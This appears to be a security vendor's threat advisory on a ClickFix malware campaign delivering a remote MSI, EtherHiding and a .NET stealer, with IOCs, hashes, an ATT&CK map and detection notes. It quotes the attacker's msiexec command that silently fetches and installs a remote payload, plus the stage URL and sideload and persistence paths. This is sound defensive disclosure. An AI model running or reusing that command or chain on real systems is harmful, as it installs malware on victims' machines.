TLP:CLEAR

SL-ADV-2026-WP-001 · v14.13 — Omegatech ClickFix → msiexec remote-MSI → EtherHiding / Donut

Unattributed cluster on AS202412 (Omegatech Ltd., SC). Attribution held at the infrastructure level only — no named actor asserted.
Advisory SL-ADV-2026-WP-001 Wave v14.13 Detonated 2026-08-24 / 2026-08-27 Sample 260824-cb5hxsxvby (v14.10 delivery) + 260824-c8ptqsxwfs (v14.11 full detonation) + 260827-cl6tqswzgs (v14.12, 4 profiles) Lure gbcu.org.il Analyst SecureLeaf / Dispensight
CLASSIFICATION — continuation of the v14 family (v14.13), NOT v15.0.

The PowerShell is very different this wave — delivery re-tooled to a silent msiexec remote-MSI install — but every durable anchor holds: the RSA-1024 CAPI C2 handshake key fired in process memory, the C2/stage IP 158.94.211.92 is reused, and the new MSI host sits inside AS202412. A v15.0 label should be reserved for a break in the durable C2 key or code prologue — which did not occur here.

1 · Executive summary

On 2026-08-24 a fresh detonation of the WP-002 chain was captured from the compromised Israeli lure host gbcu.org.il. The victim was steered through a ClickFix clipboard-paste overlay whose client stage (/mpackage.js, a ~132 KB VM-obfuscated JavaScript) plants a silent remote-MSI command:

msiexec /i "https://cloudfrontenterprise.com/get/my?sid=<epoch-ms>-<8char>" /qn

This replaces the v14.9 IRM → password-ZIP → build.exe path with an msiexec LOLBIN (T1218.007) pulling the payload MSI over HTTPS. Three victim sessions were observed (1787536535958-i0cxy4o51787536610190-oqlgj67r1787536664828-xhrcamir); the last was leaked verbatim into Edge's Bing "parachute" search telemetry, confirming the clipboard-paste vector.

v14.11 + v14.12 + v14.13 updates — full chain corroborated, reconfirmed, then memory-verified. A second detonation (260824-c8ptqsxwfs) captured the post-install DLL side-loading + process injection + a raw-TCP C2/exfil channel that v14.10 could only infer from lineage — see §7. A third round of detonations (260827-cl6tqswzgs) then reconfirmed the raw-TCP C2 socket as durable, added a new Scheduled Task persistence technique, and rotated the sideload kit again while leaving its persistence tail unchanged — see §8. Full process memdumps from that same 260827-cl6tqswzgs run then let us confirm — by direct memory evidence rather than sandbox heuristic tags — the screen capture, AES exfil, TcpClient exfil, and reflective-assembly capabilities the family has carried since the earliest v14.x reports — see §9.

2 · Kill chain (this wave)

Compromised lure
gbcu.org.il · 107.6.176.102
→ ClickFix stage JS
cdn.claritydelivr.com /mpackage.js
(cleartext, 158.94.211.92)
→ Clipboard paste-run
PowerShell → msiexec
→ Silent remote MSI
cloudfrontenterprise.com /get/my?sid=… /qn
~4.26 MB over TLS · 91.92.240.194
→ EtherHiding bootstrap
bsc-testnet-rpc.publicnode.com
(abused-legit)
→ [inferred] Donut .NET stealer
RSA-wrapped AES exfil

Only stages up to and including the MSI delivery + EtherHiding contact were observed on the wire. The final stage is greyed as inferred.

3 · Why this is v14, not v15 — anchor analysis

Signalv14.10 baselineVerdict
Durable RSA-1024 CAPI C2 key
modulus SHA-256 dc4cb858…febfac6f, e=65537
Fired in process memory (deployed ClickFix-v8 signature hit)UNCHANGED — dispositive
C2 / stage IP158.94.211.92 (AS202412, 158.94.211.0/24) — via cdn.claritydelivr.comREUSED cross-wave
Hosting ASNMSI host 91.92.240.194 ∈ AS202412 91.92.240.0/24SAME dependency
EtherHiding bootstrapBSC-testnet RPC contactedCONSISTENT
Victim token grammarsid=<epoch-ms>-<8char>CONSISTENT
ClickFix-v8 SHA1 anchor91A9773E…C674C3E0MATCHED
Delivery mechanismmsiexec remote-MSI /qn (was IRM→ZIP→build.exe in v14.9)CHANGED — wave-level
Front / stage domainscloudfrontenterprise.com · cdn.claritydelivr.com (new)ROTATED — expected
Stage filename / formmpackage.js — 132 KB VM-obfuscated JS (new)CHANGED — wave-level
MSI host domain (v14.12)cloudsenterprise2026.com — same IP 91.92.240.194ROTATED again — expected, IP anchor held
Raw C2 socket (v14.11→v14.12)158.94.208.92:61120CONFIRMED cross-wave — new durable anchor
Persistence tail (v14.11→v14.12)CLIQuery\ + memu.exeUNCHANGED — new durable path pivot

Delivery re-tooling and domain rotation are exactly what a wave does; the cryptographic identity is what a family is. Every durable anchor has held across three consecutive waves (v14.10→v14.12), so this is still filed as v14.x, currently v14.12.

4 · Behavioural analysis — what the processes are doing

5 · Network IOCs

IndicatorResolvedRoleHandling
gbcu.org.il107.6.176.102ClickFix lure (compromised)VICTIM — do NOT blocklist (splitcam)
cdn.claritydelivr.com158.94.211.92Stage/JS (mpackage.js) → durable C2/stage IPBlock / hunt
cloudfrontenterprise.com91.92.240.194MSI delivery host (CloudFront masquerade)Block / hunt
158.94.211.92AS202412 · 158.94.211.0/24Durable cross-wave C2/stage IPBlock / hunt
91.92.240.194AS202412 · 91.92.240.0/24MSI host IPBlock / hunt
bsc-testnet-rpc.publicnode.com104.20.24.117EtherHiding read layerABUSED-LEGIT — record only
cdnjs.cloudflare.com104.17.24.14 / .25.14Legit CDN (JS)Benign — do not block
splitcam rule. gbcu.org.il is a compromised third-party victim; detect the chain, not the domain. Public BSC-testnet RPC is transport — blocking it harms unrelated dApp users.

Host / command-line IOCs

MSI command
msiexec /i "https://cloudfrontenterprise.com/get/my?sid=<epoch-ms>-<8char>" /qn
Stage fetch
GET http://cdn.claritydelivr.com/mpackage.js (cleartext, from 158.94.211.92)
Victim tokens
1787536535958-i0cxy4o5 · 1787536610190-oqlgj67r · 1787536664828-xhrcamir

Durable pivots (family)

PivotValue
RSA-1024 C2 key (modulus SHA-256)dc4cb85885ffcf7bfa6f37c8ac4a8334a9504c06df0307a599c67ee2febfac6f · e=65537
ClickFix-v8 PS-stage SHA1 anchor91A9773E7A0BA4700195CBFFFF935A24C674C3E0
MZER + GetPC prologue (offset 0)4D 5A 45 52 E8 00 00 00 00 59 48 83 E9 09
Native downloader imphash8e7b065c967657cca657d11206f96e23
CLR loader imphashedc8ef44e1870aad7a3e58dab17f8e1b

6 · MITRE ATT&CK (Enterprise v16)

TacticTechniqueIDEvidence
Initial AccessDrive-by / compromised siteT1189gbcu.org.il lure
ExecutionMalicious Copy & Paste (ClickFix)T1204.004clipboard paste-run overlay
ExecutionPowerShellT1059.001PS → msiexec hand-off
Execution / Def-EvasionSystem Binary Proxy: MsiexecT1218.007msiexec /i http… /qn
Defense EvasionObfuscated Files or InformationT1027VM-obfuscated mpackage.js
Command & ControlWeb Service (EtherHiding)T1102BSC-testnet RPC
DiscoveryBrowser Information DiscoveryT1217observed
DiscoveryQuery RegistryT1012observed
DiscoverySystem Information DiscoveryT1082observed
DiscoverySystem Time DiscoveryT1124observed
Defense EvasionDLL Side-LoadingT1574.002observed (v14.11 §7.2, v14.12 §8.1 — host app rotates)
Defense Evasion / Priv EscProcess HollowingT1055.012observed (v14.11 §7.1)
Command & ControlNon-Standard PortT1571observed (v14.11 + v14.12, 158.94.208.92:61120 — durable)
PersistenceScheduled TaskT1053.005observed (v14.12, TaskScheduler COM API, all 4 profiles)
CollectionScreen CaptureT1113memory-confirmed (v14.13 §9.2, CopyFromScreen/Bitmap)
Collection / ExfiltrationArchive/Encrypt DataT1560memory-confirmed (v14.13 §9.2, AesManaged/CryptoStream)
Defense EvasionDynamic API Resolution / Reflective LoadingT1027.007memory-confirmed (v14.13 §9.2, AssemblyBuilder/DefineDynamicAssembly)

7 · v14.11 — Live detonation deep-dive (260824-c8ptqsxwfs)

This detonation ran the same lure to completion with a decryption-secrets block (TLS keylog) embedded in the capture, letting every TLS session on the wire be decrypted after the fact — including the MSI body itself. Findings below are extracted directly from the decrypted pcap and cross-validated byte-for-byte against the sandbox's own dropped-file hashes.

8.1 · Full kill chain, MSI → memory

msiexec /i …/qn
MSI SHA-256 38495f0d…09223fa
WiX Toolset 4.0.0.0, Subject "Accumulator"
→ Drop kit → %TEMP%\Inflow\
WorksFusion16.exe + 4 DLLs
→ DLL search-order hijack
signed SpUpdater.exe loads
UNSIGNED SsUCommon.dll
→ Persist → C:\ProgramData\CLIQuery\
self-copy
→ Process hollowing
SetThreadContext → self + memu.exe
→ Raw AES-over-TCP C2
158.94.208.92:61120
(new host:port, AS202412)

8.2 · DLL side-loading kit — hashes (all cross-validated vs. sandbox dropped-file list)

FileRoleSHA-256
e5a76bb.msi / MSI6AC1.tmpInstaller (WiX-built)38495f0d0aeb17e43da468e7d8befe470b64cf460ed993d06057ad13e09223fa
WorksFusion16.exeSideload host — legitimately signed PFU "SP Series Online Update" (orig. SpUpdater.exe), renamed66311b8e248cfb47f0ef29e48a996c03e25f9dd2ae1cd8d7289710d6a5459dcc
SsUCommon.dllMalicious payload — UNSIGNED, spoofs the genuine PFU export table (41 exports)4d3fc09569f76eb2d16d7f880284e218481ed6ac0ada0592a53b71e8ed683809
covrun32.dllLegit-signed decoy (MS Visual Studio Code Coverage Runtime)6b3f04318d3d5fd0074227eeb99f00a05b56fd0ad331a6489fb7314b5ffcf51b
ucrtbase.dllLegit-signed decoy (MS C Runtime)b59c1f7e457b144a211b74b31492a68a7844232121c4046c7538b0d2ab3cfc31
msvcp_win.dllLegit-signed decoy (MS C Runtime)7a3d3b2dd5dbc304a1b0536ef0f9a41922e9ce06a25e9914a36d3160ba1f3d40

None of the five on-disk PEs carry the durable MZER+GetPC prologue or either durable imphash (8e7b065c… / edc8ef44…). Consistent with those cross-wave anchors living only in the memory-resident CLR stage reached via the injection chain above — not in the on-disk sideload kit. Sandbox family tags for this sample: HijackLoader / IDAT loader / Ghostulse — a tooling-level observation, not a change to attribution (still infrastructure-level, unattributed).

8.3 · ClickFix backend execution-confirmation polling

Characterized for the first time in this run: the lure page's client JS polls the stage host roughly every 3 seconds —

GET /js-status?callback=handleCmdCheck_<epoch-ms>_<n>&sid=<token>&id=<token>
→ handleCmdCheck_..._n({"executed":false,"sid":"<token>"});

Twenty-one polls returned executed:false before the twenty-second flipped to executed:true — the backend tracks, per victim session id, whether the pasted msiexec command actually ran, independent of MSI delivery. This is a distinct, high-fidelity detection surface from the MSI/domain IOCs already tracked.

8.4 · New / updated durable pivots

PivotValueStatus
Raw AES C2/exfil socket158.94.208.92:61120NEW — same AS202412 /24 block as 158.94.211.92; provisional cross-wave anchor pending 2nd-wave confirmation
ClickFix status-poll pattern/js-status?callback=handleCmdCheck_…&sid=…NEW — endpoint/callback naming specific to this cluster
Sideload host binaryPFU "SP Series Online Update" (SpUpdater.exe)NEW — single-sample, provisional
Sideloaded payload DLLSsUCommon.dll (unsigned, spoofed exports)NEW — single-sample, provisional
splitcam addendum. 158.94.208.0/24 is already inside the tracked AS202412 21-prefix list — no expansion needed, just a new host+port anchor within known infra.

8 · v14.12 — Second-wave corroboration (260827-cl6tqswzgs)

Two further detonations of the same lure (tria.ge 260827-cl6tqswzgs, 4 sandbox profiles) landed shortly after v14.11. The headline: one v14.11 "provisional" anchor is now durable, one new technique appeared, and the sideload kit rotated again while its persistence tail did not.

8.1 · Anchor status changes

Anchorv14.11 statusv14.12 findingVerdict
158.94.208.92:61120Provisional (1 wave)Reconfirmed live in behavioral1.pcapng — identical 4-byte length-prefixed framing, different frame sizesPROMOTED — durable
C:\ProgramData\CLIQuery\ + memu.exeObserved onceByte-identical name and path in this wave, despite everything around it rotatingPROMOTED — strongest current path pivot
MSI host domaincloudfrontenterprise.comcloudsenterprise2026.comROTATED — expected; IP 91.92.240.194 unchanged
Stage domain/IPcdn.claritydelivr.com / 158.94.211.92UnchangedUNCHANGED — 3rd wave running
js-status backend pollhandleCmdCheck_<ts>_<n>&sid=…Unchanged, same grammarUNCHANGED
Sideload host binaryPFU "SP Series Online Update" (SpUpdater.exe)Unidentified Qt-based appROTATED — different legit app abused entirely
Sideload staging folder%TEMP%\Inflow\%APPDATA%\Trypaflavine\ROTATED
Persistence techniqueSelf-copy + process injection only+ Scheduled Task via TaskScheduler COM APINEW — T1053.005

8.2 · What we couldn't get this round

MSI not recovered. The msiexec download this wave rode a TLS 1.2 session (858 KB on the wire, matching the expected MSI size) that the embedded pcap keylog did not cover — likely a session outside the keylog's capture window or a cipher suite the log doesn't key. No new file hashes for Utility-Sync16.exe or the Qt DLL set this wave; static confirmation of the new sideload kit is an open item.

8.3 · New dropped files (names only, unhashed)

Staging folder
%APPDATA%\Trypaflavine\
Sideload host
Utility-Sync16.exe (cf. WorksFusion16.exe in v14.11 — both "…16.exe")
Bundled DLLs
Qt5Widgets.dll, Qt5Network.dll, Qt5Core.dll, Qt5Gui.dll, BLauncher.dll, KernelTraceControl.dll, msvcp140.dll, msvcp140_1.dll, vcruntime140.dll, msvcp_win.dll, ucrtbase.dll
Persistence copy
C:\ProgramData\CLIQuery\Utility-Sync16.exe
Secondary payload
C:\Users\Admin\AppData\Roaming\CLIQuery\memu.exe (identical to v14.11)
Rotated MSI domain
hxxps://cloudsenterprise2026.com/get/my?sid=<epoch-ms>-<8char> (same grammar, same IP 91.92.240.194)
EtherHiding fallbacks
bsc-testnet.bnbchain.org, bsc-testnet.drpc.org (alongside the usual publicnode.com — abused-legit, do not block)

Sandbox note: all four v14.12 profiles ran the lure through Firefox (-osint -url) rather than Chrome — most likely a sandbox-side choice, but it confirms the ClickFix chain isn't Chrome-specific. desktop.ini touches under Documents/Public in the report are attributable to Firefox itself, not flagged as malicious.

9 · v14.13 — Payload capabilities memory-confirmed (260827-cl6tqswzgs memdumps)

Full process memory dumps from the same 260827-cl6tqswzgs run (behavioral1: PIDs 5244, 5384, 4640, 2240, 1728; behavioral2: PID 3108) let us move several long-standing signature descriptions into direct evidence. A third archive, initially suspected to hold keys/certs relevant to the campaign, turned out to be unrelated.

9.1 · Ruled out: xx.tar is a benign Firefox artifact

1,886 UUID objects with .meta.json sidecars turned out to be Mozilla's legitimate Intermediate CA Preloading cache (security-state-staging/intermediates Remote Settings collection) — real public intermediate CA certificates from DigiCert, GlobalSign, Alibaba Cloud, and others. Standard Firefox behavior, present only because this wave's sandbox profiles ran the lure through Firefox rather than Chrome (§8). Not pursued further.

9.2 · Confirmed by memory evidence, not just sandbox tags

PID 5384 — the process injected via SetThreadContext from the CLIQuery-resident sideload host — contains a reflectively-loaded assembly whose .NET Base Class Library API strings directly confirm capabilities the Triage signature descriptions have carried since the earliest v14.x reports:

(+ WebClient/DownloadString as an HTTP fallback channel, not previously documented) — the native loader manually hosts the CLR rather than being a normal managed EXE — runtime IL emission, matching the technique name exactly
Signature description (previously inferred)Memory evidence (now confirmed)
GDI screen captureCopyFromScreen, Bitmap, ImageFormat, Encoder
AES CryptoStream exfilAesManaged, CipherMode, CreateEncryptor, CreateDecryptor, CryptoStream
Raw TcpClient exfilTcpClient
"CLR-hosted"CorBindToRuntime, CLRCreateInstance, CorExitProcess
"Reflective assembly"AssemblyBuilder, DefineDynamicAssembly, DefineDynamicModule, System.Reflection.Emit

Local variable/field names in this payload are short randomized tokens (unit34, wave26, wrap02, wrk112, pipe410, vec84, and similar) that clearly rotate per build — not usable as durable strings. The new YARA rule (§9.4) targets the BCL API names instead, which the payload cannot rotate away without breaking functionality.

9.3 · Identified and ruled out: PowerShell's own compiler service

PID 1728 (behavioral1) and PID 3108 (behavioral2) both contain a genuine, fully-parseable .NET DLL with a valid CLR header — but its class/method names (AddNamesInInheritanceHierarchy, AnonymousTypeDisplayClass, and other C#/VB symbol-table internals) identify it as the .NET Framework's own C#/VB compiler service, not the payload. Almost certainly present because the ClickFix PowerShell stage uses Add-Type to dynamically compile inline C# — consistent with the long-standing "ClickFix v8 — PowerShell stage: PSReadLine + .NET + RSA key in process memory" signature. Identical in both behavioral captures, byte-for-byte in the regions checked.

9.4 · What we still don't have

No RSA modulus/PUBLICKEYBLOB bytes and no C2 IP/domain strings turned up as plaintext in this dump set — the durable RSA-1024 CAPI key and network config are evidently assembled programmatically at runtime, or live in memory regions this capture didn't include. Two ~2 MB regions shared identically across all four behavioral1 PIDs at the high 0x7FFB80A5xxxx address are a common system DLL (consistent with ntdll.dll/kernelbase.dll) and carry no payload-specific content.

9.5 · New YARA rule: memory-scan capability fingerprint

WP002_CLR_infostealer_capability_fingerprint_v14_13 — requires 2 of the screen-capture strings, 2 of the AES strings, 1 network string, 1 CLR-hosting string, and 1 reflective-assembly string in the same scanned region. Intended for memory/process scanning (Sysmon+YARA, Moneta, Hollows Hunter, or an EDR memory-scan feature) rather than static file scanning of the small native stub loaders, which don't carry these strings themselves.

10 · Companion artifacts